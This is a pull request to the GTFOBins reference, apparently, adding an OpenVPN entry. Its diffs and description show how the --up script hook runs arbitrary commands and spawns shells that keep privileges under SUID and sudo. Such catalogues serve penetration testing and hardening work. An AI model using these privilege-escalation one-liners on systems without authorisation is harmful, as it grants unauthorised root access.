### PR TITLE
New: OpenVPN

### DIFF
--- a/_gtfobins/openvpn.md
+++ b/_gtfobins/openvpn.md
@@ -7,7 +7,7 @@ functions:
   suid:
     - code: |
         COMMAND='id'
-        openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -c \"$COMMAND\""
+        openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -p -c \"$COMMAND\""
   sudo:
     - code: |
         COMMAND='id'

--- a/_gtfobins/openvpn.md
+++ b/_gtfobins/openvpn.md
@@ -1,5 +1,13 @@
 ---
 functions:
+  command:
+    - code: |
+        COMMAND='id'
+        TF=$(mktemp)
+        echo '#!/usr/bin/env sh' > $TF
+        echo "$COMMAND" >> $TF
+        chmod +x $TF
+        openvpn --dev tun0 --script-security 2 --up $TF
   suid:
     - code: |
         COMMAND='id'
@@ -16,12 +24,4 @@ functions:
         echo "$COMMAND" >> $TF
         chmod +x $TF
         sudo openvpn --dev tun0 --script-security 2 --up $TF
-  command:
-    - code: |
-        COMMAND='id'
-        TF=$(mktemp)
-        echo '#!/usr/bin/env sh' > $TF
-        echo "$COMMAND" >> $TF
-        chmod +x $TF
-        openvpn --dev tun0 --script-security 2 --up $TF
 ---

--- a/_gtfobins/openvpn.md
+++ b/_gtfobins/openvpn.md
@@ -1,18 +1,10 @@
 ---
 functions:
-  command:
-    - code: |
-        COMMAND='id'
-        openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -c \"$COMMAND\""
-  shell:
-    - code: |
-        openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -c sh"
   suid:
     - code: |
-        COMMAND='id'
-        openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -p -c \"$COMMAND\""
+        ./openvpn --dev tun0 --script-security 2 --up '/bin/sh -p -c "sh -p"'
   sudo:
     - code: |
         COMMAND='id'
-        sudo openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -c \"$COMMAND\""
+        sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh'
 ---

--- a/_gtfobins/openvpn.md
+++ b/_gtfobins/openvpn.md
@@ -1,0 +1,27 @@
+---
+functions:
+  suid:
+    - code: |
+        COMMAND='id'
+        TF=$(mktemp)
+        echo '#!/usr/bin/env -S sh -p' > $TF
+        echo "$COMMAND" >> $TF
+        chmod +x $TF
+        openvpn --dev tun0 --script-security 2 --up $TF
+  sudo:
+    - code: |
+        COMMAND='id'
+        TF=$(mktemp)
+        echo '#!/usr/bin/env sh' > $TF
+        echo "$COMMAND" >> $TF
+        chmod +x $TF
+        openvpn --dev tun0 --script-security 2 --up $TF
+  command:
+    - code: |
+        COMMAND='id'
+        TF=$(mktemp)
+        echo '#!/usr/bin/env sh' > $TF
+        echo "$COMMAND" >> $TF
+        chmod +x $TF
+        openvpn --dev tun0 --script-security 2 --up $TF
+---

--- a/_gtfobins/openvpn.md
+++ b/_gtfobins/openvpn.md
@@ -15,7 +15,7 @@ functions:
         echo '#!/usr/bin/env sh' > $TF
         echo "$COMMAND" >> $TF
         chmod +x $TF
-        openvpn --dev tun0 --script-security 2 --up $TF
+        sudo openvpn --dev tun0 --script-security 2 --up $TF
   command:
     - code: |
         COMMAND='id'

--- a/_gtfobins/openvpn.md
+++ b/_gtfobins/openvpn.md
@@ -4,6 +4,9 @@ functions:
     - code: |
         COMMAND='id'
         openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -c \"$COMMAND\""
+  shell:
+    - code: |
+        openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -c sh"
   suid:
     - code: |
         COMMAND='id'

--- a/_gtfobins/openvpn.md
+++ b/_gtfobins/openvpn.md
@@ -3,25 +3,13 @@ functions:
   command:
     - code: |
         COMMAND='id'
-        TF=$(mktemp)
-        echo '#!/usr/bin/env sh' > $TF
-        echo "$COMMAND" >> $TF
-        chmod +x $TF
-        openvpn --dev tun0 --script-security 2 --up $TF
+        openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -c \"$COMMAND\""
   suid:
     - code: |
         COMMAND='id'
-        TF=$(mktemp)
-        echo '#!/usr/bin/env -S sh -p' > $TF
-        echo "$COMMAND" >> $TF
-        chmod +x $TF
-        openvpn --dev tun0 --script-security 2 --up $TF
+        openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -c \"$COMMAND\""
   sudo:
     - code: |
         COMMAND='id'
-        TF=$(mktemp)
-        echo '#!/usr/bin/env sh' > $TF
-        echo "$COMMAND" >> $TF
-        chmod +x $TF
-        sudo openvpn --dev tun0 --script-security 2 --up $TF
+        sudo openvpn --dev tun0 --script-security 2 --up "/usr/bin/sh -c \"$COMMAND\""
 ---


### PR DESCRIPTION
Hi

This PR adds OpenVPN.

I had to do the command execution vi an external script, because providing a binary directly could render the command invalid because arguments are added to the command:
```
# openvpn --dev tun0 --script-security 2 --up "/usr/bin/id"
2021-02-19 12:19:26 Cipher negotiation is disabled since neither P2MP client nor server mode is enabled
2021-02-19 12:19:26 OpenVPN 2.5.0 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Oct 28 2020
2021-02-19 12:19:26 library versions: OpenSSL 1.1.1i  8 Dec 2020, LZO 2.10
2021-02-19 12:19:26 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
2021-02-19 12:19:26 ******* WARNING *******: All encryption and authentication features disabled -- All data will be tunnelled as clear text and will not be protected against man-in-the-middle changes. PLEASE DO RECONSIDER THIS CONFIGURATION!
2021-02-19 12:19:26 TUN/TAP device tun0 opened
2021-02-19 12:19:26 /usr/bin/id tun0 1500 1500   init
/usr/bin/id: 'tun0': no such user
/usr/bin/id: '1500': no such user
/usr/bin/id: '1500': no such user
/usr/bin/id: '': no such user
/usr/bin/id: '': no such user
/usr/bin/id: 'init': no such user
2021-02-19 12:19:26 WARNING: Failed running command (--up/--down): external program exited with error status: 1
2021-02-19 12:19:26 Exiting due to fatal error
```

It would also be possible to do it via an external script:
```
COMMAND='id'
TF=$(mktemp)
echo '#!/usr/bin/env sh' > $TF 
echo "$COMMAND" >> $TF 
chmod +x $TF 
openvpn --dev tun0 --script-security 2 --up $TF 
```
I'm not sure what you prefer.

Best,
Emanuel